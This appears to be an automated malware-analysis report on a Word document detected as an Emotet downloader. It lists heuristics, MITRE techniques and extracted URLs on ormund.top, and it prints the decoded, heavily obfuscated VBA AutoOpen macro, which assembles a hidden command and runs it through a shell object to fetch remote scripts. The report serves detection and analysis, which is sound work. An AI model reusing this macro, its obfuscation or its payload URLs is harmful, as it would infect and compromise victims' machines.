Verdict: MALICIOUS
Risk Score: 232
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a legacy WordBasic AutoOpen macro that executes a heavily obfuscated command-line invocation of cmd.exe. This command attempts to download and execute payloads from the URLs http://ormund.top/template.js and http://ormund.top/template2.js. The ClamAV detection name 'Doc.Downloader.Emotet-6826477-0' strongly suggests the Emotet family.
Heuristics (9)
- ClamAV: Doc.Downloader.Emotet-6826477-0 (severity: critical; rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Emotet-6826477-0.
- Suspicious cmd.exe invocation with execution flag (severity: high; rule: SC_STR_CMD). Suspicious cmd.exe invocation with execution flag.
- VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 3 related findings). Document contains VBA macro code.
- GetObject call (severity: high; rule: OLE_VBA_GETOBJ). GetObject call. Matched line in script: End Select Set HrNwjAuwj = GetObject(YzziCSu + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + zjsYjrf) On Error Resume Next
- VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN). AutoOpen macro. Matched line in script: Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next
- Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (severity: info; rule: EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs:
  - http://ormund.top/template.js (in document text, OLE body)
  - http://ormund.top/template2.js (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7562 bytes |

SHA-256: 74d59230bd2d2632b9f958975b157c2636b8f5dcb6531ea331d8baa740a6923f

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 125 of 194 identifiers look randomly generated (e.g. 'ipMzpJJBsHrJ'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ipMzpJJBsHrJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case FwARI
Case 52894881
IVJnQPd = 170826284
YRYMT = CLng(291795350)
Case 336605701
znkZP = Oct(KiEoLKpZ)
wtFNb = Ornfd
Case 323796832
THqMwtRV = CDate(CskzFMb)
OLzLbS = Int(90831657 * Xzlvwtm)
End Select
On Error Resume Next
Select Case DuVpA
Case 24395197
kizrtfMz = 241745098
TTrFOr = CLng(253474196)
Case 264266640
HvZjtqJ = Oct(EErqJ)
BzUji = mRmSnzlJA
Case 273228892
iBdwp = CDate(uGAjVI)
tXKQpIuII = Int(315323274 * qJGvuEAJ)
End Select
On Error Resume Next
Select Case fEjjSTIi
Case 234130372
AfibRjYF = 98427542
oiLKq = CLng(136849787)
Case 180170728
vRYYPW = Oct(HNDsai)
wrJwn = MwPOSNtwt
Case 162874747
zrsnRObQM = CDate(KTUMo)
ljTBrj = Int(228351386 * wCKGB)
End Select
On Error Resume Next
Select Case adUqAXI
Case 144344223
kzcLzh = 44561040
DOnnCNBG = CLng(336880974)
Case 266732914
bjhDzu = Oct(flGZR)
HCSRP = FutUrf
Case 313766121
YQTjBjwuk = CDate(viQwB)
aiwhjzu = Int(240962174 * kiShLqXBD)
End Select
Set SWYiKM = Shapes("lLwkbcjCaXN")
On Error Resume Next
Select Case tzPOZV
Case 11403504
hqowToSAP = 129279133
nTFzVChEb = CLng(320582280)
Case 136369665
BSHuUhD = Oct(vXoMEj)
FfnHEPUs = oAuMsRaBM
Case 101508437
fMuwTLzA = CDate(fttoSc)
ooQLjaJ = Int(38625904 * nrciwm)
End Select
On Error Resume Next
Select Case jdHhjAuDw
Case 45886442
pGWpHUrr = 284809349
TliaEDHjj = CLng(279981090)
Case 135984907
rSawjq = Oct(nbSzAk)
mbVTvB = DQscHc
Case 322742772
TNQQZODP = CDate(oBXEP)
liqlQ = Int(212240076 * PvTCoB)
End Select
On Error Resume Next
Select Case lcXIX
Case 274258287
CGOmmihfa = 100546139
bFhUE = CLng(24372280)
Case 239294175
zmFOS = Oct(iZQEO)
QLJEp = HtCwoaUv
Case 96150915
TQXUYMpI = CDate(svfIERaMI)
PvcfQvqHB = Int(325159386 * tXsqGzj)
End Select
On Error Resume Next
Select Case NhzMkK
Case 173593913
kmwrz = 68633052
XtwIZ = CLng(8155166)
Case 10130706
fhGmM = Oct(JuHKdQw)
LlISrUI = rpprzB
Case 95041034
RJLXRiiYO = CDate(asrjTtK)
hMzHJ = Int(216142232 * QpQzU)
End Select
RaJXSq = "" + RtUEbFj + EOtPXLW + SWYiKM.TextFrame.TextRange.Text + pNatC + wTCrKzf + amzoiv
On Error Resume Next
Select Case hnswEQ
Case 197232485
cfJUB = 290787514
EtfEdJj = CLng(314993159)
Case 311619512
UHasz = Oct(hEhiOXczq)
uQXkSn = QVoIVZK
Case 11991069
zqkIDQdkb = CDate(UOKhQi)
OOPYKm = Int(211763034 * KXKmMiX)
End Select
On Error Resume Next
Select Case PDjmME
Case 126163578
pCniIFQ = 245217382
ptQXdS = CLng(220255847)
Case 305667599
bHLKi = Oct(TsNpKhlK)
UvkTuM = nwJwIUo
Case 250268057
BrHcLQfU = CDate(PQrab)
DizDhhOz = Int(290128835 * UMAmd)
End Select
On Error Resume Next
Select Case IpdtDc
Case 119652815
zUzOHPA = 247324148
rOkTpEbS = CLng(166973873)
Case 211257429
nnqXUIjO = Oct(oVous)
wzLtbwf = FFLzSkBb
Case 197579710
fkMiZuwfm = CDate(sVapaSGi)
jEoHD = Int(242020985 * IJRdzM)
End Select
On Error Resume Next
Select Case cruzX
Case 209449386
ZQjFh = 19254013
KGvuGs = CLng(280243040)
Case 113056610
MiOQvsTz = Oct(zIIoj)
DmGNpHjb = BCustdY
Case 62892519
JhRIPG = CDate(wiAjuCWW)
qUmdbZ = Int(211918466 * oPszb)
End Select
On Error Resume Next
Select Case YGaijA
Case 27427107
PcqKKEs = 235487811
jwFYvo = CLng(162471075)
Case 146569710
zbQhWwfb = Oct(EkzSwUrr)
MHmXOUj = LGudRCHDD
Case 185689063
hGufiT = CDate(zORzkjDS)
OtZNvA = Int(150117270 * YhHmipOt)
End Select
Set HrNwjAuwj = GetObject(YzziCSu + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + zjsYjrf)
On Error Resume Next
Select Case iiSDYv
Case 315692207
QHjOuWJ = 104537123
ROCmDBm = CLng(195183687)
Case 88767583
fYfQwSkau = Oct(vXNHEH)
jrRNzci = hZhidfaL
Case 29014982
AkrjwK = CDate(OzbuBvhwf)
mwdiv = Int(326599528 * PsCvRkV)
End Select
On Error Resume Next
Select Case zXuHjkto
Case 28821488
GMzjBjBu = 74259262
AJadGYcr = CLng(323525474)
Case 129182705
VZAzLGsi = Oct(WYUJuFm)
MLzNPnln = RAHHCrkzl
Case 254779418
kpcILmNbo = CDate(iBmtfl)
YGmPLO = Int(274024887 * aRThkJJSn)
End Select
Const QwWHRLtrfw = 0
On Error Resume Next
Select Case twwzdBLs
Case 122483075
kzYLBmcwm = 312622351
WoLtuh = CLng(284789800)
Case 209545130
DiFjHGFqf = Oct(AiwWNzSA)
IMsiwd = HnEiUUM
Case 160540123
CtsEujlTF = CDate(cYSwvcjcX)
KzHCkwRl = Int(321057548 * jWZaLD)
End Select
On Error Resume Next
Select Case NTLhw
Case 220376932
wjRdr = 342291972
mPAJna = CLng(155023319)
Case 54858670
QwaQhnvak = Oct(ElcCYlLui)
jfApsNCqd = niFWulWRb
Case 75163866
qsBvjJMb = CDate(bftSNlv)
XUkEzpBa = Int(212011795 * InOuT)
End Select
On Error Resume Next
Select Case ioISjcYM
Case 177166775
jovzz = 16553402
CDktkA = CLng(210230592)
Case 222572642
jmmWfUaZ = Oct(DiZTHj)
fhnPFnMa = oVDmzo
Case 188643686
uwmaEXOO = CDate(juYqjvB)
FSsSjt = Int(170124206 * KrwWmS)
End Select
HrNwjAuwj.Run@ RaJXSq, QwWHRLtrfw
On Error Resume Next
Select Case YTKZtRXO
Case 53397894
uhcJIAnm = 203220234
uowYOM = CLng(113576967)
Case 338242736
NFDFu = Oct(YYrmFdvcV)
wjJJz = UfTsj
Case 141849434
KjzYEudq = CDate(iSkbwAZ)
wMcPRjHpK = Int(80226448 * XmBHCljF)
End Select
End Sub